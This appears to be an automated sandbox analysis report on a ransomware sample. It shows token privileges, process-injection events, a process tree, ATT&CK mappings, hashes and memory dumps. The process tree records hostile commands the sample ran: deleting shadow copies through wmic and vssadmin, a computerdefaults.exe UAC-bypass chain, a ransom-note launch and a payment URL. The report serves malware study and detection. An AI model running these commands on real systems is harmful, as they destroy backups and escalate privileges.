Token: SeShutdownPrivilege	2056
Token: SeCreatePagefilePrivilege	2056
Token: SeIncreaseQuotaPrivilege	2340	wmic.exe
Token: SeSecurityPrivilege	2340	wmic.exe
Token: SeTakeOwnershipPrivilege	2340	wmic.exe
Token: SeLoadDriverPrivilege	2340	wmic.exe
Token: SeSystemProfilePrivilege	2340	wmic.exe
Token: SeSystemtimePrivilege	2340	wmic.exe
Token: SeProfSingleProcessPrivilege	2340	wmic.exe
Token: SeIncBasePriorityPrivilege	2340	wmic.exe
Token: SeCreatePagefilePrivilege	2340	wmic.exe
Token: SeBackupPrivilege	2340	wmic.exe
Token: SeRestorePrivilege	2340	wmic.exe
Token: SeShutdownPrivilege	2340	wmic.exe
Token: SeDebugPrivilege	2340	wmic.exe
Token: SeSystemEnvironmentPrivilege	2340	wmic.exe
Token: SeRemoteShutdownPrivilege	2340	wmic.exe
Token: SeUndockPrivilege	2340	wmic.exe
Token: SeManageVolumePrivilege	2340	wmic.exe
Token: 33	2340	wmic.exe
Token: 34	2340	wmic.exe
Token: 35	2340	wmic.exe
Token: 36	2340	wmic.exe
Token: SeIncreaseQuotaPrivilege	1884	WMIC.exe
Token: SeSecurityPrivilege	1884	WMIC.exe
Token: SeTakeOwnershipPrivilege	1884	WMIC.exe
Token: SeLoadDriverPrivilege	1884	WMIC.exe
Token: SeSystemProfilePrivilege	1884	WMIC.exe
Token: SeSystemtimePrivilege	1884	WMIC.exe
Token: SeProfSingleProcessPrivilege	1884	WMIC.exe
Token: SeIncBasePriorityPrivilege	1884	WMIC.exe
Token: SeCreatePagefilePrivilege	1884	WMIC.exe
Token: SeBackupPrivilege	1884	WMIC.exe
Token: SeRestorePrivilege	1884	WMIC.exe
Token: SeShutdownPrivilege	1884	WMIC.exe
Token: SeDebugPrivilege	1884	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1884	WMIC.exe
Token: SeRemoteShutdownPrivilege	1884	WMIC.exe
Token: SeUndockPrivilege	1884	WMIC.exe
Token: SeManageVolumePrivilege	1884	WMIC.exe
Token: 33	1884	WMIC.exe
Token: 34	1884	WMIC.exe
Token: 35	1884	WMIC.exe
Token: 36	1884	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1080	WMIC.exe
Token: SeSecurityPrivilege	1080	WMIC.exe
Token: SeTakeOwnershipPrivilege	1080	WMIC.exe
Token: SeLoadDriverPrivilege	1080	WMIC.exe
Token: SeSystemProfilePrivilege	1080	WMIC.exe
Token: SeSystemtimePrivilege	1080	WMIC.exe
Token: SeProfSingleProcessPrivilege	1080	WMIC.exe
Token: SeIncBasePriorityPrivilege	1080	WMIC.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	Process
2056
4012	MicrosoftEdge.exe
2960	MicrosoftEdgeCP.exe
2960	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

rundll32.execmd.execmd.execmd.execmd.exeMicrosoftEdgeCP.exe

description	pid	Process	procid_target
PID 3996 wrote to memory of 2140	3996	rundll32.exe	70
PID 3996 wrote to memory of 2140	3996	rundll32.exe	70
PID 3996 wrote to memory of 952	3996	rundll32.exe	71
PID 3996 wrote to memory of 952	3996	rundll32.exe	71
PID 3996 wrote to memory of 2340	3996	rundll32.exe	73
PID 3996 wrote to memory of 2340	3996	rundll32.exe	73
PID 3996 wrote to memory of 2264	3996	rundll32.exe	78
PID 3996 wrote to memory of 2264	3996	rundll32.exe	78
PID 3996 wrote to memory of 1156	3996	rundll32.exe	75
PID 3996 wrote to memory of 1156	3996	rundll32.exe	75
PID 1156 wrote to memory of 1884	1156	cmd.exe	79
PID 1156 wrote to memory of 1884	1156	cmd.exe	79
PID 2264 wrote to memory of 1080	2264	cmd.exe	80
PID 2264 wrote to memory of 1080	2264	cmd.exe	80
PID 2156 wrote to memory of 3208	2156	cmd.exe	90
PID 2156 wrote to memory of 3208	2156	cmd.exe	90
PID 2712 wrote to memory of 824	2712	cmd.exe	91
PID 2712 wrote to memory of 824	2712	cmd.exe	91
PID 2960 wrote to memory of 2724	2960	MicrosoftEdgeCP.exe	96
PID 2960 wrote to memory of 2724	2960	MicrosoftEdgeCP.exe	96
PID 2960 wrote to memory of 2724	2960	MicrosoftEdgeCP.exe	96
PID 2960 wrote to memory of 2724	2960	MicrosoftEdgeCP.exe	96
PID 2960 wrote to memory of 2724	2960	MicrosoftEdgeCP.exe	96
PID 2960 wrote to memory of 2724	2960	MicrosoftEdgeCP.exe	96

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\xnfipyy.inf.dll,#1
1⤵
- Modifies extensions of user files
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3996
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2140
- C:\Windows\system32\cmd.exe
  cmd /c "start http://62c4684026f46e107cdujyxylz.wonsre.space/dujyxylz^&1^&28731418^&60^&271^&2215063"
  2⤵
  - Checks computer location settings
  PID:952
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2340
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1156
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1884
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2264
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1080

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:824

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3208

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2756

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3404

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4012

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2468

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2960

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:2724

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2768

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\readme.txt

MD5
e77eb8b3514c271a603f3837ce58c5b8

SHA1
e8697207ae183d1b0a10c509a0fdd3d61b069ebe

SHA256
36fc3611e8ac4d511c034545f2cec1cc85887c58dddba978879366a2385fe0a9

SHA512
2690e4efda7df9ba1501b1a675a1118ddcc42fbccd749a61338f504cfaf9aebe03bdc31197d7067da92152c4388cfed61388758214cca4934f9f92ebfb37817d

Download Submit
memory/824-142-0x0000000000000000-mapping.dmp

Download
memory/952-134-0x0000000000000000-mapping.dmp

Download
memory/1080-140-0x0000000000000000-mapping.dmp

Download
memory/1156-137-0x0000000000000000-mapping.dmp

Download
memory/1884-139-0x0000000000000000-mapping.dmp

Download
memory/2140-132-0x0000000000000000-mapping.dmp

Download
memory/2264-136-0x0000000000000000-mapping.dmp

Download
memory/2340-135-0x0000000000000000-mapping.dmp

Download
memory/3208-141-0x0000000000000000-mapping.dmp

Download
memory/3788-144-0x0000027087A70000-0x0000027087A71000-memory.dmp

Filesize
4KB

Download
memory/3788-143-0x0000027087B10000-0x0000027087B18000-memory.dmp

Filesize
32KB

Download
memory/3996-124-0x0000019618B40000-0x0000019618B41000-memory.dmp

Filesize
4KB

Download
memory/3996-125-0x0000019618B50000-0x0000019618B51000-memory.dmp

Filesize
4KB

Download
memory/3996-130-0x000001961C670000-0x000001961C671000-memory.dmp

Filesize
4KB

Download
memory/3996-129-0x0000019619140000-0x0000019619141000-memory.dmp

Filesize
4KB

Download
memory/3996-128-0x0000019619130000-0x0000019619131000-memory.dmp

Filesize
4KB

Download
memory/3996-127-0x0000019619120000-0x0000019619121000-memory.dmp

Filesize
4KB

Download
memory/3996-126-0x0000019619110000-0x0000019619111000-memory.dmp

Filesize
4KB

Download
memory/3996-131-0x000001961C680000-0x000001961C685000-memory.dmp

Filesize
20KB

Download
memory/3996-138-0x000001961E1A0000-0x000001961E1A1000-memory.dmp

Filesize
4KB

Download
memory/3996-119-0x0000019618920000-0x0000019618921000-memory.dmp

Filesize
4KB

Download
memory/3996-123-0x0000019618B30000-0x0000019618B31000-memory.dmp

Filesize
4KB

Download
memory/3996-122-0x0000019618B20000-0x0000019618B21000-memory.dmp

Filesize
4KB

Download
memory/3996-118-0x0000019618BA0000-0x000001961910D000-memory.dmp

Filesize
5.4MB

Download
memory/3996-121-0x0000019618B10000-0x0000019618B11000-memory.dmp

Filesize
4KB

Download
memory/3996-120-0x0000019618B00000-0x0000019618B01000-memory.dmp

Filesize
4KB

Download